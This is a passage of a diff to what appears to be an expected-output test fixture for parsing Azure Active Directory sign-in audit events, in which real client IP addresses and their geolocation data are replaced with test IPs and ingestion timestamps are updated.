.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -3170,25 +2762,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -3202,7 +2776,7 @@
 "ObjectId": "00000002-0000-0000-c000-000000000000",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "KeepMeSignedIn": "False",
 "ResultStatusDetail": "Success",
@@ -3252,7 +2826,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -3264,12 +2838,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "83.57.233.151",
- "ip": "83.57.233.151"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "event": {
- "ingested": "2021-06-17T07:32:46.051547900Z",
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"0b158f74-e223-43c8-9cfd-5f4442f29fc7\",\"InterSystemsId\":\"5cd6215d-e206-4c3f-805d-6e386cbdab7a\",\"IntraSystemId\":\"9c218a27-ed51-4011-8383-e76850e85000\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
+ "ingested": "2021-12-09T13:42:12.970190400Z",
+ "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:01\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"0b158f74-e223-43c8-9cfd-5f4442f29fc7\",\"InterSystemsId\":\"5cd6215d-e206-4c3f-805d-6e386cbdab7a\",\"IntraSystemId\":\"9c218a27-ed51-4011-8383-e76850e85000\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -3308,25 +2882,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "213.97.47.133"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -3340,7 +2896,7 @@
 "ObjectId": "00000003-0000-0ff1-ce00-000000000000",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "213.97.47.133",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "KeepMeSignedIn": "True",
 "ResultStatusDetail": "Success",
@@ -3390,7 +2946,7 @@
 "asr"
 ],
 "ip": [
- "213.97.47.133"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -3402,12 +2958,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "213.97.47.133",
- "ip": "213.97.47.133"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "event": {
- "ingested": "2021-06-17T07:32:46.051551100Z",
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"00000003-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"4819a0c2-2050-4549-ab66-f5b90cbbcc5a\",\"InterSystemsId\":\"612b339f-1088-a000-f25f-9c8af4d57894\",\"IntraSystemId\":\"c847a864-4ba2-4d8b-a9f2-5f1c1c5c5e00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
+ "ingested": "2021-12-09T13:42:12.970195900Z",
+ "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000003-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"4819a0c2-2050-4549-ab66-f5b90cbbcc5a\",\"InterSystemsId\":\"612b339f-1088-a000-f25f-9c8af4d57894\",\"IntraSystemId\":\"c847a864-4ba2-4d8b-a9f2-5f1c1c5c5e00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -3446,25 +3002,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "79.159.10.151"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -3478,7 +3016,7 @@
 "ObjectId": "00000002-0000-0000-c000-000000000000",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "79.159.10.151",
+ "ActorIpAddress": "67.43.156.13",
 "ExtendedProperties": {
 "KeepMeSignedIn": "False",
 "ResultStatusDetail": "Success",
@@ -3528,7 +3066,7 @@
 "asr"
 ],
 "ip": [
- "79.159.10.151"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -3540,12 +3078,12 @@
 "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"
 },
 "client": {
- "address": "79.159.10.151",
- "ip": "79.159.10.151"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-17T07:32:46.051554400Z",
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:29\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"e94002d9-f6e8-46f9-8702-2a29e908e73d\",\"InterSystemsId\":\"61eb5713-2687-4c00-a7b2-fde4788c395b\",\"IntraSystemId\":\"3db9a461-6dd1-4950-b3e3-fbe8c2d5c700\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
+ "ingested": "2021-12-09T13:42:12.970201500Z",
+ "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:29\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"e94002d9-f6e8-46f9-8702-2a29e908e73d\",\"InterSystemsId\":\"61eb5713-2687-4c00-a7b2-fde4788c395b\",\"IntraSystemId\":\"3db9a461-6dd1-4950-b3e3-fbe8c2d5c700\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -3584,25 +3122,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "79.159.10.151"
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -3616,7 +3136,7 @@
 "ObjectId": "00000003-0000-0000-c000-000000000000",
 "ResultStatus": "Succeeded",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "79.159.10.151",
+ "ActorIpAddress": "67.43.156.13",
 "ExtendedProperties": {
 "KeepMeSignedIn": "False",
 "ResultStatusDetail": "Redirect",
@@ -3666,7 +3186,7 @@
 "asr"
 ],
 "ip": [
- "79.159.10.151"
+ "67.43.156.13"
 ]
 },
 "organization": {
@@ -3678,12 +3198,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051571600Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"1ca4f684-3a34-44a8-99b8-064d1071768a\",\"InterSystemsId\":\"61f81224-65fd-4c1b-b388-ee0e25485191\",\"IntraSystemId\":\"dc0cc415-9a00-470d-bda3-867e11fdd400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970207100Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"1ca4f684-3a34-44a8-99b8-064d1071768a\",\"InterSystemsId\":\"61f81224-65fd-4c1b-b388-ee0e25485191\",\"IntraSystemId\":\"dc0cc415-9a00-470d-bda3-867e11fdd400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -3722,25 +3242,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -3754,7 +3256,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -3804,7 +3306,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { 
@@ -3816,12 +3318,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051576700Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:51:50\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3f6c8eb2-c64b-4dc5-b8fd-be252f8e09c2\",\"InterSystemsId\":\"661f2330-3e04-483d-9781-caaa4543cc13\",\"IntraSystemId\":\"01c15486-46e2-487a-91f5-11445da0b600\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970212800Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:50\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3f6c8eb2-c64b-4dc5-b8fd-be252f8e09c2\",\"InterSystemsId\":\"661f2330-3e04-483d-9781-caaa4543cc13\",\"IntraSystemId\":\"01c15486-46e2-487a-91f5-11445da0b600\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -3860,25 +3362,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -3892,7 +3376,7 @@ "ObjectId": "0f698dd4-f011-4d23-a33e-b36416dcb1e6", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -3942,7 +3426,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -3954,12 +3438,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051580100Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:42\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 